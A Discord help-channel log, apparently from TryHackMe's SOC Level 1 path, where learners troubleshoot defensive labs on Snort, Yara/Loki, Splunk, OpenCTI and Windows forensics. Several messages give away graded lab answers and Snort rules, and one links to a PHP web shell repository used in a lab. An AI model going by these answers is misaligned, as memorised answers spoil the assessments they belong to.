cmnatic@thm-yara:~/tools/Loki$ python3 loki.py -h
Traceback (most recent call last):
File "loki.py", line 43, in <module>
from lib.lokilogger import *
File "/home/cmnatic/tools/Loki/lib/lokilogger.py", line 15, in <module>
from helpers import removeNonAsciiDrop
ModuleNotFoundError: No module named 'helpers'
```
oops, my badge was removed as they added new labs? ok fine ....
Which badge? the labs etc. Can you share more details / SS etc so it can be looked at?
Really old school, it still has Darks name on it.
just ben and ashu :(
yo guys, are there 19 challenges that will be added today in the SOC L1 path?
19? I thought just a few
19 yes
@hot thorn Yes - 19! 🙂 The update will be taking place shortly after 4PM BST (in the next 5-10 minutes)
i'm excited for the extra content but i'm ready to finish this path and get on to pentest+ lol
Is there anyone who can help with a potential issue with a challenge in the Threat Intelligence Tools room that is part of the SOC 1 Path?
Anyone having issues with the website?
I was on earlier this morning, EST, and just got back on a few minutes ago too.
Site is back up good to go
I never get badges on rooms that I've finished before they're assigned to a learning path. Kind of a bummer.
same here buddy, any suggestions
@upper dew @fierce frost @leaden tapir the room has been bugged for a little while now. I've reported that issue some time ago and it's either not been fixed or deemed working as intended
for the destination address of packet 63 it's not taking the last number, it's asking for 2 digits
i just tested the room with a single rule for port 80 and it's working as intended
at least for Q2 task 2
the destination IP is the one the room expects
Okay, yea I tried to report it myself but didn't find away to. I have attempted adjusting the rules and nothing helps so I moved on. if you have any suggestions to get the answer that be great help.
I just tested the room with the correct snort rule and it seems to be working
I'm going step by step to confirm 100% but right now it seems fine
Just checked all the questions and their answers, it's working as intended now
the two that I'm missing is shown below, not sure why the answers I get don't work or are accepted
Yep, checked those as well. The correct answer is in the correct packet
So you have 2 rules written now, any 80 <> any any and any any <> any 80
that's why you have the wrong answer. You only need one of those rules
output with 2 rules
and correct output with 1 rule
Please don't post room answers in chat.
Did not like Windows forensics 1/2, machine is too slow to load files.
hi is there some bug on snort challenge basic? in the question number 2?
"Investigate the log file.
What is the destination address of packet 63?"
i already investigated it and found the ip but i keep getting wrong answer
I'm wondering.. does this path get you to really understand real-time procedures and scenarios?
Like how to handle events and responses.
In other words, is the completion of this path + CompTIA PenTest+ cert + CCNA + 2 years experience as a network technician enough to get me my first job in the field???
no one can answer if you will get a job
that’s circumstantial
but more knowledge would surely help
I completed that yesterday and it worked fine. Check your snort rule carefully
thanks mate i already finished it yesterday
Gave +1 Rep to @floral zodiac (current: #1436 - 2)
Nice!!
is the VM machine really slow?
I'm doing the NetworkMiner room and the VM is super slow
At times, yes. They all take about a minute to boot up. Overall, not bad speed just have to be patient after the initial boot up
i got no problem with the boot up, but when i'm using the applications on the vm it's really super slow to hover
yea sometimes the attack box too when im using it the linux terminal or the applications there is really slow to move
If you haven’t already, try changing your region in the access section of the site. No clue if that works but maybe? Seemed to help me a while ago as I’m not having as many slow sessions as I used to, at least that’s what it feels like
ok, i'll try that mate thanks for that.
No prob my dude
I appreciate the challenges added to each section. helps put the specific skills to test outside the set questions.
Hi there, Is there an alternative to app.phishtool.com ?
Are you trying to read the E-mails in the attackbox?
Yes
Use Thunderbird mail, the tasks advises this.
Thank you!
Gave +1 Rep to @primal igloo (current: #1 - 2558)
Are we supposed to attach the email to Thunderbird? I am unable to set up an account on Thunderbird
Account isn't needed 🙂
Just hit cancel
In "Cyber threat intelligence" Scenario 1, after I input the file sha256 the report didn't show any Detection Alias that starts with an H'
Hello, any suggestions on how to change region in THM? My VM takes long to load. But also, when I try to open a file in Chrome, I get "out of date". Any suggestions? I submitted a ticket but haven't heard back
Go to the top of the website toolbar and click the Access selection. You can change your server there
Ps I have no clue if this actually helps anything. Could be total placebo 🫠
Actually it did lol. Thanks a lot. The only issue I have to deal with is why chrome in the attackbox keeps on saying outdated and i cant get it to update lol
Gave +1 Rep to @floral zodiac (current: #882 - 4)
Nice! Glad to know it helped. Try using firefox instead.
Question: Mimikatz, a known attack tool, was detected running on the IT Manager's computer. What is the mission of the tool?
What is Mimikatz mostly used for?
Credential dumping
😄
I did that room a while back but if I remember correctly there’s a button where you open file or something on the top right of the thundermail webpage
boogeyman1
any hint here ?
used tshark to retrieve the exfiltrated file which starts with 27f***** and converted most of the ASCII strings into text, but I can't locate the credit card number. Is there a shorter way?
Update: i think the last question is a bit advanced.
@open quest
I'm in the Sysmon room on task 4, third question. I have identified the event and have tried to put in the UTC time as requested, but it's marked as incorrect. I checked writeups and videos and everyone is getting the same answer?
can you share your answer ?
yes one second i got disconnected
should i send as a spoiler?
||2021–01–06 01:35:50.464||
im not sure what just happened maybe there was a punctuation mark i didnt see or something i just resubmitted the answer and it worked
thanks for responding mach
You are welcome
For those working in this field what other labs for try hack me will you recommend me to complete as I just completed splunk any other's interesting labs?
While I’m not in the field currently, I’d think all of what’s listed in the SOC 1 path will be relevant…I’d hope at least!
IDS/IPS modules, EDS there’s so much you can do in the SOC learning paths.
Oh is your current relating to any cyber security?
Would anyone be able to answer a question for me about the itsyBitsy room? I found the answer to the second question concerning the suspicious IP but I was wondering what exactly makes it suspicious? Is it that its ||User_agent is an admin account||?
added spoiler to avoid the clue if anyone doesnt want it
Soc is a cyber role. Check it out - tons in the learning path. I would think it’s practical Information otherwise we’d all be wasting our time and money (which we aren’t IMO)
Hello there, can someone explain how to use Snort to analyse a packet: must I use the conf file every time I use Snort, i.e. /etc/snort/snort.conf? When I run Snort, e.g. "sudo snort -de", and then run the traffic script, it doesn't change anything on the Snort prompt (the instruction stated it should show in verbose mode after running the traffic script). What could I have been doing wrong?
Hello who's at the retracted room right now?
I can't seem to find the answer for task 2 q3 the time in details of the file is wrong
#1265686354990207056 might be some help.
Lots of people have trouble with that one, including me, I spent probably a couple hours on it before I was even in the right log collection. Make sure you’re searching in the right area first
Oh thanks
if you go to the #1265686354990207056 room discussion on this discord you will actually see me have my aha moment and maybe get a couple hints to help you along the way.
I've finished my 2hrs without advancing I'll just sleep through it now hoping to get answer tomorrow I'm very sleepy that I can't focus 😆
I feel that I got really frustrated with that room hope you get it tomorrow!
is anyone else having trouble with the splunk basics room? When I try to search for the IP 107.14.182.38 to find the username in the question I get 0 results? I watched a youtube writeup and followed it exactly but he is getting results?
the last IP of the same task is also not appearing?
For some challenges you might need to write your own rule to get the right output. In most challenges you substitute the snort.conf file with a local.rules (or equivalent) file
Thank you, I am still trying to understand how to use it, writing rules I guess should come later.
Gave +1 Rep to @scenic heron (current: #1449 - 2)
Hello there, in Snort Task 8, how are we supposed to get a pcap?
If it's for the basic snort room all the pcaps should be on the machine attached to the room
No, it's not. When I run the command "snort -r icmp-test.pcap" I was greeted with the error "file or directory not found"
Are you running snort from within the task 8 directory?
Either run the shell from within the directory or cd to it
🥸 wow, I didn't realise that. Thank you for your time 🙂
no worries
I'm in cyber now. They asked about IDS/IPS EDS in the interview. They also asked about WAFs, and Firewall rules.
One thing I've learned is no matter how experienced you are, it pays to study for your interview. So when you start interviewing make sure you do some interview prep. Youtube has tons of videos on soc analyst interview questions
Thanks! I have yet to break into the industry so speaking merely off of what I’d expect to be true
Gave +1 Rep to @autumn garden (current: #2182 - 1)
In the TEMPEST room there is a tool on the attached VM called SysmonView. The room says it is one of Eric Zimmerman's EZ Tools but it isn't. I've searched everywhere for a place to download that tool with no luck.
Does anyone have an idea as to where I can download or obtain a copy of that tool?
Are you in the split screen or the attackbox?
When I booted the VM up, it was called Tempest VM
Also the room links Zimmermans github.
Hi Scrubz,
Thank you for your answers.
I don't have any problem using it in the VM. I want to download and use it on personal computer so I can practice different scenarios.
I also have clicked the link for EZ tools but SysmonView is not listed on his github page with the rest of the EZ tools.
Like I said I want to find it to use in my personal computer.
Do you or anyone else know where I can find it?
https://github.com/nshalabi/SysmonTools is this what you're looking for?
Lana
Yes, That is what I'm looking for. Thank you!
Gave +1 Rep to @torpid acorn (current: #1458 - 2)
For Threat Intelligence Tools Task 7, is it possible that the detection aliases for the hash have changed? I've googled and found the answer, but it just isn't included in the Talos list anymore.
Yes, I can double check later. 🙂
For Windows Forensics 1, why is the last known good configuration ControlSet001 when the text says this?
|| In most cases, ControlSet001 will point to the Control Set that the machine booted with, and ControlSet002 will be the last known good configuration. Their locations will be:
SYSTEM\ControlSet001
SYSTEM\ControlSet002 ||
Hello everyone, there seems to be a bug in the “Benign” room question #9 (The suspicious file downloaded from the C2 server contained malicious content with the pattern THM{..........}; what is that pattern?). I tried using the flag located at https://controlc.com/e4d11035 but it’s not working.
I put this in the room bugs chat a few weeks ago I’m not sure if they are working on anything for it right now or not.
hmm, I'll look into this. Thanks for pointing it out.
Gave +1 Rep to @timid vale (current: #2204 - 1)
No problem. Do I get a cookie? A 1 month voucher maybe? 😉
I think the text to the question could be clarified or maybe changed. The SYSTEM\Select\LastKnownGood REG_DWORD contains the value of which currentcontrolset was the last known good (maybe that is currentcontrolset001, maybe currentcontrolset002). In the body of Task 6 it talks about LastKnownGood and it has a screenshot showing LastKnownGood as 0x1, so the question/answer is correct as per this screenshot. The text mentioning ControlSet002 could do with a clarification or rewording. Maybe even a better question could be around which registry value you would look at to identify which CurrentControlSet holds the LastKnownGood.
Hey all, I am having an issue in a VM within the Snort challenge - Basics. As soon as I create a log through the snort command line (sudo snort -c local.rules -l . -r [pcap file]) the log appears for a second and then disappears.
Such a thing never happened before in any of the previous exercises.
Can anybody help me?
I spawned the machine few times and now it works!
Hi team, I just wanted to report some ambiguity with questions or confirm if maybe I'm missing something, going through the MITRE room as a refresher and getting the below questions. Specifically, the questions in ATT&CK Framework citing "this technique" is vague (Q's 2 and 3) and doesn't highlight what technique needs to be ID'ed. Am I missing something here or is this insufficiently worded?
(I would show a screenshot but I have limited privileges, assuming due to being new.)
Never mind, overlooked the content wording toward the bottom of the task, Answer the questions below didn't reference it, that's on me for not reading close enough
Q5 of that task may need an update as there are four groups now
Q10 also incorrect, techniques have increased to 16
Hi. In the T&VM Mitre room, this question "What groups have used spear-phishing in their campaigns? " might need to be validated. I think the answer should be Axiom,Hikit not Axiom,GoldSouthfield.
Hello, Hikit is malware, not a group
Thanks for the reply! 😉
Gave +1 Rep to @dapper flame (current: #2212 - 1)
Hmm
There is a way to verify your THM account so that you can do screenshots just can’t figure out where the pinned message is so that I can tag you with it. Anyone else know what I’m talking about?
this article
Hey guys,
I'm working on
SOC Level 1: Network Security and Traffic Analysis - Snort Challenge - The Basics, and I’ve hit a bit of a roadblock with some questions. I’ve managed to get the correct outputs, but they aren’t being accepted as correct answers. Here’s what I need help with:
- Destination address of packet 63 My answer: 145.254.160.237
- ACK number of packet 64 My answer: 0x38AFFFF3
- SEQ number of packet 62
My answer: 0x38AFFFF3
I’ve checked the log files as per the hints, but I’m still having trouble. Any guidance on what I might be missing or doing wrong would be greatly appreciated!
Thanks in advance for your help!
hi, i have a problem with the Phishing Prevention room. When i submit the answer, which is "<domain> service ready", it doesn't work. Please help me solve the problem; i still just have this question and then i finish the whole room on SOC1
Edit: I found a shared link with the most updated correct answers 😉 : https://github.com/cyberterms/tryhackme-write-ups/blob/main/snort-challenge-the-basics/write-up.md
Same with me
i think the problem not from us the problem with tryhackme
Which question?
Make sure you capitalize the S in service
Ah i see you got an answer
i found the solution from someone on the Discord: the problem was to remove just <> and it will be the answer, like this: domain service ready
My answer was <domain> Service ready
If you try it with another account it won't work
now, how can i download the certificate? it just appears without the download button
you are a real life hero man, i gotta tell you that
Certificate for the learning path completion?
Hey team, I'm working through the Snort Challenge - The Basics and I could use some help. I can't get the correct answer/number of packets for question 1 in the "Writing IDS Rules (HTTP)" section. I keep getting 328 and my rule to detect "all TCP port 80 traffic" goes as follows: 1. alert tcp any 80 <> any any (msg:"TCP Port 80 Src Traffic"; sid:100001; rev:1;) 2. alert tcp any any <> any 80 (msg:"TCP Port 80 Des Traffic"; sid:100002; rev:2;)
Haha, thanks! Took me long enough, but if I can’t save the world, I hope I saved you some time! 😄
Gave +1 Rep to @final stream (current: #2220 - 1)
Hello there, I am trying to use Wazuh server but it kept showing "The connection has timed out" I waited more than 5 minutes before accessing the link
Hi guys,
I'm currently stuck on the Yara room, task 9 (Creating Yara rules with yarGen), with the question "Copy the Yara rule you created into the Loki signature directory"
The question doesn't ask for an answer, but I just don't understand what they asked me to do; my common sense is broken here. Am I supposed to move the file "file2.yar" to the same directory as the file "loki.py", or am I supposed to run a command to copy the content of "file2.yar" inside the file "loki.py"?
You need to put the rule inside the directory loki.py uses to test files
Thanks for your answer !
Can I just do file2.yar >> loki.py or do I need to manually copy some lines inside ?
Gave +1 Rep to @dapper flame (current: #1116 - 3)
Okay nevermind, my brain started to work again, I didn't get that the "Loki signature directory" from the question is in reality a directory called "signature-base" and I needed to move the "file2.yar" rule to the sub folder called "yara"
Hey there, I don't know if it's a bug or not :
I'm in the OpenCTI room on task 6, for the question "How many malware relations are linked to this Attack Technique?", and so I'm looking in the 'Related Entities' category (in the Knowledge tab) to see how many there are, but it's empty (image 1). When I look in the Overview category (still in the Knowledge tab), I can see 3 related malware (image 2), but the answer expects 3 characters, so I'm a bit confused. I also checked the Malware category and indeed there are 3 related malware (image 3), but I still can't find an answer
If someone could lend me an hint I would be grateful
EDIT: I got the answer; there are 2 techniques with the same name, I was looking at the wrong one
Hi all.
I have a question about the "Retracted" room in the SOC level 1 path.
A file named antivirus.exe is present at C:\Users\Sophie\download\antivirus.exe
That file had to be created at some time. Why is there no Sysmon event 11 that contains the words download\antivirus?
If you check the properties of the antivirus file it shows to have been created on Monday, January 8, 2024, 2:14:27 PM
The attached pic shows a process creation at 2:15 as the first time "download\antivirus" is found. How can a file be created without there being an event 11?
I can't seem to connect to the OpenCTI dashboard in the OpenCTI room. I gave it 10+ min on the attackbox but it's still refusing the connection
Nmap it.
Got it now, took almost 20 min to start up though
Yeah, that service possibly takes the longest.
```
└─# nslookup tryhackme.com 10.200.26.101
;; communications error to 10.200.26.101#53: timed out
;; communications error to 10.200.26.101#53: timed out
;; communications error to 10.200.26.101#53: timed out
;; no servers could be reached
```
why is it not working?
Check pinned posts in #breaching-ad
hmm
Is Sysmon kinda like a local SIEM?
Where you can set up rules and alerts, unlike event viewer or process viewer?
i'm on the threat intelligence tools room task 7, I generated the hash and fed it into the talos and while it does show me several aliases none of them start with H
hm
I don't think you set up rules, but Sysmon basically monitors and logs system activity and sends it to Event Viewer
Only thing I can think of is integrating sysmon with a SIEM so you can do both and have less noise in your SIEM
Also sysmon logs process creation which is very helpful too
6
Hello, is there a problem on the VM MISP_2023_v4? I just get Gateway time-out
Problem solved: the link doesn't replace the IP 🙂
I thought the learning paths are free but I have not been able to subscribe
Hey THM community, I'm struggling with the room "Creating Yara rules with yarGen'. Please DM me if you could help :)))
Apparently, Talos updated their aliases list or something. Anyway, I was able to get it from VirusTotal
ask it here.
hey fam, having the same problem. Is something supposed to come up? The box loaded but I'm still not sure how to connect
oh there finally it loaded 20min it is 😆
Yeah it takes a long while
Please, does anyone have books on incident response or SOC?
more likely to find answers in #bookclub
@nimble oasis thank you
Gave +1 Rep to @nimble oasis (current: #3 - 1924)
Hey all, just completed the Retracted Room in the SOC 1 learning path, I was wondering if anyone knows why a malicious actor would gain a change of heart and decrypt all the encrypted files/donate a large sum of bitcoin after the fact. There must be more to this that I'm missing, no?
Hello.
I've got a question but I'm not sure if this is the right chat. If not, I'll delete it, I'm doing the SOC path but every time I use the attack box, it takes an extremely long time to load, write, and open tools. It’s taking me twice as long to complete tasks because of the lag. Is this normal? I've been using THM for almost a year now, but this is the first time I notice everything gets so slow
Some groups have rules on what to attack and what not to attack, see LockBit gave the decryption key to a sick children's hospital; the group in question kicked the member responsible for the attack.
Thank you! That makes a lot more sense now.
Gave +1 Rep to @primal igloo (current: #1 - 2884)
Can someone recommend a place to enhance Wireshark skills learned from the SOC L1 path? I gave www[.]malware-traffic-analysis[.]net a try, the exercises that exist on the site but even then, I only found like 1/10 of the information, the rest was incorrect, I know that Wireshark or analyst skills in general are crucial for the role and I wish to improve them, if anyone knows a way to do that or in general to recommend something, please let me know!
^^
I recommend analyzing other sample pcaps
other sample pcaps from the same site? I tried the first one which I assume should be the easiest challenge and yet I failed miserably at it
cheers, that looks pretty good
Thing is, it’s kinda hard to find other resources that explain everything because once you get the basics Wireshark commands, you have to use your investigative skills to find the stuff you’re looking for
Having trouble getting past SOC Level 1 -> Cyber Defence Framework-> MITRE-> Task 8, last question
@blissful loom or Other staff ^
Hey there, it seems like the MITRE framework has been updated, making the answer no longer valid.
The original answer is ||Azure AD, Google Workspace, IaaS, Office 365, SaaS|| which can be found under Valid Accounts: Cloud Accounts by referring to question #2 as mentioned in the task.
Using a wayback machine, you can see the valid answer here - https://web.archive.org/web/20240613094045/https://attack.mitre.org/techniques/T1078/004/
Hope that helps out, meanwhile I'll report the issue to the admins 🙂
Thank you. I was actually really close to the answer. I couldn't get Google Workspace.
Gave +1 Rep to @deep trout (current: #377 - 14)
You were definitely on right track, keep it going!
Hey there, currently doing the Secret Recipe room (Windows registry) and was working on the question
What is the Last DHCP IP assigned to this host?
based on the last Last Write Timestamp of one of the subkeys being 2022-10-12 8:53:05 PM UTC, I figured this subkey would contain the answer; however, the expected answer is actually from a different subkey which has the last write timestamp of 2021-03-17 2:58:47 PM UTC.
am I missing something or is the expected answer wrong?
The Summit room in SOC Level 1 -> Cyber Defence Framework->Summit. When launching the attack box the url given shows a bad gateway error?
504 or 405?
Damn i finally completed the Zeek room with almost no help from the write ups !
I'm feeling the knowledge pouring into me bits by bits at last !
congrats, keep it up
Hi, anyone got tips on how to gradually get better at solving the capstone challenges without relying on writeups somewhere down the line? I feel like the rooms themselves are manageable but its just that there are times where I get stuck, maybe just understanding the writeups is a good way to start and just repeating the room and writing every detail and thought I have would help? Just curious if anyone has some notes/pointers, cause I took a peek of soc level 2 and log analysis looks it would have been super helpful for the rooms in soc level 1 path, like soc-1 is really good at teaching basic fundamentals and how to use the tools, especially with the provided commands, but it doesn't really teach you how to think for yourself i feel like or maybe i'm doing something wrong :I
I am facing the same issues. Hope someone has a better process to learn
Yeah.. I mean I play CTFs and didn't understand anything first few months, after reading most writeups per ctf i started getting enough knowledge to understand and start placing at least not at the very bottom of the CTFs lol, but i don't know if thats a good way to learn actual cybersecurity hahaha maybe someone got a really goated method, i start talking to myself to try and break down a problem but it gets looped back to the problem of me not understand enough of the basics or the actual thought process of where to look for the specific IoCs and etc, using tools is fairly okay, knowing where to look at and interpreting data is difficult, to say the least
it's completely fine if you feel struck some times, it's a part of the process and in that case you use writeups or blogs to solve the problems, remember it's important to keep learning while you are doing all of this, eventually you will be able to solve your problem on your own with the experience and knowledge you are getting. good luck 🤝
out of all the SOC stuff I've learned so far which is around 60% of it, Splunk is probably one of the coolest thing I've stumbled upon, it's creators deserve to be praised by security analysts
Im having issues completing Task 7 and 8 of
SOC Level 1 -> Cyber Threat Intelligence ->Threat Intelligence Tools
The second question on T7 and the second question of T8.
I'm not sure about T7, but I know T8 is ||Trojan||
For Task7 question
Go to attachments and copy the SHA-256 hash. Open Cisco Talos and check the reputation of the file. You will get the alias name. (hint given : starts with H)
For Task8 question
Copy the SHA-256 hash and open Cisco Talos and check the reputation of the file. You will get the name of the malware family here
I was also stuck on the same task. It took me 30 minutes to figure it out without walkthrough. I did the same @vagrant charm mentioned in the chat.
Great 👍
You can also check in VirusTotal
Ahh Gotcha, Thank you! @vagrant charm
Gave +1 Rep to @vagrant charm (current: #245 - 25)
Took me 2 days even with the walkthru (dont ask me how lol). But finally got it. Thanks @vagrant charm @plush junco
Gave +1 Rep to @plush junco (current: #1181 - 3)
Hi, I managed to clear the capstone challenges for SOC 1, but somewhere down the line I had to use writeups, most of the email/basic splunk stuff was easy, but searching for specific answers just wasn't up to my knowledge, anyone know where I can read up on how to get the proper mindset to do hive forensics and etc?
I'm currently doing the Windows Forensics which contains Hive keys, if I get something in mind, I'll let you know 🙂
Thanks, I'm still stuck on understanding which hives to look at for specific data, I'll just be relying on cheat sheets for now
I don't see the option to download attachments literally anywhere. I can only access the email files within the VM. Very confused, could you please fill me in a little more? Thanks
Gave +1 Rep to @vagrant charm (current: #179 - 40)
To complete this task you need to get the SHA-256 sum of the file. You can type this in the terminal: sha256sum filename, and check that hash value either in Cisco Talos under the reputation section, or you can use VirusTotal if you like
Hey, how much time does it typically take to complete the SOC Level 1 path? I’m preparing for a SOC role and plan to learn from the SOC Level 1 path and complete it within this month. After that, I plan to start applying for SOC jobs next month. What do you think of my plan? Is it possible to finish it within this month if I start today?
What does soc mean
Where we use it
The hyperlink for the FireEye apt group is not available and it redirects to the google cloud website Mandiant page.
In Pyramid of Pain room
phew, this one was slow-going for a bit, definitely not the most intuitive tool out there to get up and running with, but once I figured it out it was actually pretty cool and the practical portions of the room were very straightforward. definitely set aside a block of time for yourself when you do this one; besides the time it takes to figure out how to use it, just loading a project into the thing takes like 10-20 minutes.
Well if you spend like 5/6hs a day yes, anything less and u wont, but thats why u have the schedule planner on the right, put in the hours youll study and it will approximate when youll finish the course. Thats an approximation ofc, not everyone spends 30 mins to read 3 general definitions and do 1 exercise
did you ever figure this out? im having the same issue with Redline and not got a clue what to do. i saw no reply to your issue
"System Information was not configured to be collected. Click here to review which audits where configured" and u click and it literally has all categories from Sys Information lmao
Hi
i have a problem with snort challenge - the basics, Task 2: all the questions i get are same as in writeups i found but when i type it in as answer it isnt good, so am i missing something or the code im running isnt good?
i just wanna know how did u guys do task 2, 2nd question and ill figure it out alone but for some reason it aint working
For task 2 question 2:
Check if you have sudo permissions to view any files snort produces - use command sudo chown -R ubuntu /home/ubuntu/Desktop/Exercise-Files/
Make sure the rules in local.rules are:
alert tcp any 80 <> any any (msg:"TCP port 80 inbound traffic detected"; sid:1000000000001; rev:1;) and
alert tcp any any <> any 80 (msg:"TCP port 80 outbound traffic detected"; sid:1000000000002; rev:1;) (place each rule on an individual line)
--EDIT--
Remove the previous alert file and snort log: sudo rm [PREVIOUS SNORT LOG] ; sudo rm alert
Run snort again with: sudo snort -A full -r ftp-png-gif.pcap -c local.rules -l .
--EDIT ENDS--
Search for the 63rd packet by using snort -r [SNORT LOG HERE] -n 63, then just look at the terminal to find the destination ip
hope this helps you out @fiery marsh
Hey community! I am facing an issue with room "Snort Challenge - The Basics". I completed all tasks but for three questions of Task 2 my answers are not accepted. Despite that, I think that my answer is correct; the format is not matching the answer format and so it is not accepted. Here we go: Question 2 "What is the destination address of packet 63?" if I look into packet 63 I see as destination IP "145.254.160.237" but the wanted answer format is "...". The same for question 3 "What is the ACK number of packet 64?" and 4 "What is the SEQ number of packet 62?" where my answers are not accepted. Could someone please enlighten me? Thanks in advance....
help please
You may describe what type of help do you need and folks will surely help out.
I’m currently working on wireshark traffic analysis and have a question about the dns pcap question what is abnormal dns traffic?
Well it can be anything that stands out of the ordinary , for example , too many failed login attempts and suchlike 🙂
Has anyone else experienced problems with connecting to the MISP room?
Works fine for me 😄
It takes more than 10 minutes to properly run. So wait for few minutes
You get certificate if you complete SOC level 1? I just started, seems long too. Can I put it on my resume or should I just say I have experience in an SOC environment?
You can claim the certificate only after you finish the pathway 🙂
do i have to use my own email to use the phishtool?
No 🙂
Nvm to this, I am super slow
Hey, What room has the link to cyber chef?
Here's the link 🙂
The Cyber Swiss Army Knife - a web app for encryption, encoding, compression and data analysis
I’m stuck on task 5. How and what am I supposed to defang?
Type defang in cyberchef search menu and select Defang IP or URL depending on what you need to defang 🙂
I tried everything. What up address am I supposed to defang?
Which Task and which question ?
This room ?
I'm in yara trying to start VM, its just black screen, what am I doing wrong? am I dumb?
No , you are not 🙂 . Have you tried to terminate that instance and start a new one 🙂
many times, I also tried other browsers, disable adblocker, another computer with another wifi still no use
Have you tried to start it in full-screen view 😦 ?
it won't let me, I press on view in full screen and nothing happens?
do I need to press start attackbox too? in addistion to start VM?
You shouldn't need to 😦 . Try to ask in this channel https://discord.com/channels/521382216299839518/559443389058252800 it's more active than this one 🙂
thanks!!
I'm almost completed the soc level 1 path(90%) done. Now i noticed the soc simulator anyone tried it yet? i'm curious about it and took a peak at it, but never wrote a report so is there someone who can help me with it?
I think that sim is only for business users for now 😦
How am I supposed to use virus total to scan a file if I can’t connect to the internet?
Use your own browser
I need the file
You don't , you can use hash of the file
Yall expect me to download a file off a VM to my computer?
That’s what I was thinking
I knew that
No , use hash of the file to search
lol
It is accessible and I can claim an allert for investigation then there is a button of write a report
Well , I am not sure then . I can't access it 🙂
strange. i assume you have a subscription
Yes , I have but it asks me to upgrade to business plan 🙂
connected again and it is working. was trying to make screenshot but can't paste it here.
You will have to verify in order to upload images 🙂
FYI: The Brim reference is a tool which was renamed Zui in 2021 and is considered a legacy tool by the devs.
Well , thanks for informing me , I'll try 😄
Gave +1 Rep to @restive gull (current: #2586 - 1)
Has anyone else ran into difficulties with the NetworkMiner lab? Everytime I open the mx-7 pcap and apply filtering the app crashes then the VM either crashes or shuts down…
It worked ok for me 😦
This is the 4th time I’ve had to reopen the VM because it keeps crashing, the first 2 pcap files I had no issue with
Also on a side note in the same room, the question asking for which email sent the password reset. It’s not actually a password reset email.
I think I've had also same experience with some rooms from the SOC path taking very long to load or crashing, NetworkMiner could've been one of them but I cannot surely verify
I somewhat remember I had to analyze multiple PCAP files and some were working, others not really (slow load times / crashing)
And I am done, keep grinding at it! I got stuck a couple times, you will have it beat before you know it.
Congrats , great job 🥳
Hey, how come I can’t get Loki to run on the VM I tried everything. I’m stuck on this task
How long did it take you?
Months, but I also got stuck and focused on another cert for a couple months.
Keep up the good work 🙂
Make sure that you're in the Loki directory
I’m in the directory but the commands don’t seem to be working
Can you provide a screenshot 🙂 ?
I can't see anything here bro 🙂
Type ls
👍
You tried to open lcki.py , try with loki.py 🙂
I know
Then why are you trying to do so 🙂 ?
Cause I’m getting desperate
./loki.py
Type ls in that dir so I can see the list of files
Try to use python loki.py
That's it then 🙂
No
I’m not getting of the answers to the questions
Why is this not working
👋
You are in the wrong directory
The directions say to call Loki.py from within the directory with the suspicious files
note that I am calling Loki from the file 1 directory you called Loki from within the Loki directory
Use clipboard
ctrl + shift + c
ctrl + shift + v
Then right click > copy
Not working
Not working
windows or linux???
vm or not???
I got it to work. Took a while to figure it out.
I’m just a little rusty plus I’m at my other job so my time is limited.
This is the safe bet, when I get going quick and accidentally ctrl + c the revshell 😂
🤣 You're definitely right , thanks for adding that benefit 🤣
Gave +1 Rep to @wheat crane (current: #255 - 26)
Hi there, how are you guys doing ?
I'm currently working on the snort challenge - The Basic room and I'm stuck on Task 4, the first question : "Investigate the logs and identify the software name embedded in the packet."
I'm trying to run the following command : sudo grep -a -i "software" snort.log.1737399919
but all I get is a bunch of unreadable characters, can you give me an hint to put me on the right path please ?
I tried to run the command with an others strings but nothing so far
Can you provide a screenshot 🙂 ?
Hello everyone. I have a bit of hiccup in Windows event logs task 5.1 and task 5.2.
Can anyone help me?
What's the problem 🙂 ?
I can't send screenshot here
You can but you will have to verify first 🙂
https://help.tryhackme.com/en/articles/6495858-discord-how-do-i-verify-my-tryhackme-account
These are where i have issues in
My answers seems to be wrong. Don't know why.
What are your answers ?
Get-WinEvent -LogName Application -FilterXPath ‘*/System/Provider[@Name=”WLMS”] and */System/TimeCreated[@SystemTime=”2020–12–15T01:09:08.940277500Z”]’
question task 5.1
Get-WinEvent -LogName Security -FilterXPath ‘*/EventData/Data[@Name=”TargetUserName”]=”Sam” and */System/EventID=”4720"’
question task 5.2
Can you provide a room link
alright
Your answers seem correct but your formatting may be bad , try to refresh the page and copy this 🙂
Get-WinEvent -LogName Application -FilterXPath '*/System/Provider[@Name="WLMS"] and */System/TimeCreated[@SystemTime="2020-12-15T01:09:08.940277500Z"]'
Get-WinEvent -LogName Security -FilterXPath '*/EventData/Data[@Name="TargetUserName"]="Sam" and */System/EventID=4720'
Alright, thank you. Let me try that.
Gave +1 Rep to @quasi bough (current: #2 - 2308)
Worked😮💨
Thanks alot for your help.
Seems like you were using ” instead of " and ‘ instead of '
That was the problem 🙂
🤦🏽♂️ thanks for the clarification
Gave +1 Rep to @quasi bough (current: #2 - 2310)
Not an important question, but I just saw the SOC Simulator email - the SOC sim has been up for a while now right? Or am I gaslighting myself lol
It has been up for a while. Though, I think now two are available to try.
It is around since late December 🙂
Hi there,
I got a question regarding the Networkminer room, on task 7, Is it me or the given frame number doesn't exist ?
And yes I opened mx-7.pcap
The only question I found so far is the source address of the image "ads.bmp.2E5F0FD9.bmp", otherwise, for all the question related to frame number, I don't manage to find them, each time there are not in the Files list
mx-7.pcap should be used in Task 5 not Task 7 🙂 . What's the exact question you're struggling with ?
I managed to find the answer by other mean but it was the same question as shown in the screenshot above
Hmmm... All but the last 2 rooms of the module in one weekend. To keep going or to rest my eyeballs, that is the question... 😅
Congrats , great job 😄 🚀
Thanks!
Yeah, this topic definitely holds my interest pretty well 😆
Gave +1 Rep to @quasi bough (current: #2 - 2544)
Yup, did one more, now my eyes are bleeding 😭
I'm calling it right there
You definitely deserve some rest buddy 😄
^ xD
Shouldn't it be "greater than 1,000,000"?
On the machine provided in the task
i need help with cyber kill chain task 9
What’s up? What have you already tried to find the answer?
What's the problem 🙂 ?
Hello, am working on SOC simulation lab - Phishing Unfolding and when i try to access to the analyst VM they asked me to type a username and password, did any one know the creds?
Try to ask in #soc-sim-help channel 🙂
Ok, thank you.
Gave +1 Rep to @quasi bough (current: #2 - 2766)
Hi I would like to ask about the soc simulator understand that it operates similarly to the their competitor from letsdefend unfortunately I dont get my gradings am I doing anything wrong after closing the report as True positive and there are no attachments for me to investigate from the email as well ?
Try to ask in #soc-sim-help channel , this channel is not that active
got it mate
I am stuck in the Yara room with the question: What JavaScript library is used by file 2? The hint says Go to the Github page and search inside the index.php file. Please help
Line below it 🙂
Don't get it
Look at the requirements on GitHub page
First line are PHP req.
Line below states which js library is being used 🙂
I guess that is the problem, I have many tabs with github reps and I don't know where to look at
This one 🙂
https://github.com/b374k/b374k
